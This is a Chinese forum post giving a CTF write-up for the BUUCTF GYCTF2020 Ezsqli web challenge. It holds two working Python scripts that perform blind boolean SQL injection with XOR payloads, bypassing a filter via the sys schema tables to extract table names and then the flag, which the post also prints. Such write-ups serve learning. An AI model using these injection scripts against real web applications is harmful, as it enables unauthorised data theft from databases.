54,【4】BUUCTF WEB GYCTF2020Ezsqli

打印 上一主题 下一主题

主题 905|帖子 905|积分 2715


进入靶场


吓我一跳,但凡放个彭于晏我都不说啥了

 

提交个1看看


1 and 1=1


                                                                    1'#

还实验了很多,不过都被过滤了,头疼

看看别人的WP

竟然要写代码去跑!!!,不会啊,先用别人的代码吧,后续一定去学

第一个代码爆出表名

  1. from turtle import right
  2. import requests
  3. import time
  4. url = "http://..........."
  5. table_name = ""
  6. i = 0
  7. while True:
  8.     i = i + 1
  9.     letf = 32
  10.     right = 127
  11.     while letf < right:
  12.         mid = (letf + right) // 2
  13.         payload = f"0^(ascii(substr((select group_concat(table_name) from sys.x$schema_table_statistics_with_buffer where table_schema = database()),{i},1))>{mid})"
  14.         data = {"id": payload}
  15.         res = requests.post(url=url, data=data).text
  16.         if "Nu1L" in res:
  17.             letf = mid + 1
  18.         else:
  19.             right = mid
  20.     if letf != 32:
  21.         table_name += chr(letf)
  22.         time.sleep(0.2)
  23.         print(table_name)
  24.     else:
  25.         break
复制代码
得到表名  giers233333333333333,f1ag_1s_h3r3_hhhhh

第二个代码通过表名爆出flag

  1. import requests
  2. import time
  3. url = "http://........."
  4. flag = ""
  5. i = 0
  6. while True:
  7.     i = i + 1
  8.     letf = 32
  9.     right = 127
  10.     while letf < right:
  11.         s = flag
  12.         mid = (letf+right) // 2
  13.         s = s + chr(mid)
  14.         payload = f"0^((select * from f1ag_1s_h3r3_hhhhh)>(select 1,'{s}'))"
  15.         data = {"id":payload}
  16.         res = requests.post(url=url,data=data).text
  17.         if "Nu1L" in res:
  18.             letf = mid + 1
  19.         else:
  20.             right = mid
  21.     if letf != 32:
  22.         flag += chr(letf-1)
  23.         print(flag)
  24.         time.sleep(0.2)
  25.     else:
  26.         break
复制代码
得到FLAG{E6AC8B59-EC60-4BC1-A3C9-C6B770B889CE}
即flag{e6ac8b59-ec60-4bc1-a3c9-c6b770b889ce}


条记

学习python脚本怎么写
 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

麻花痒

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表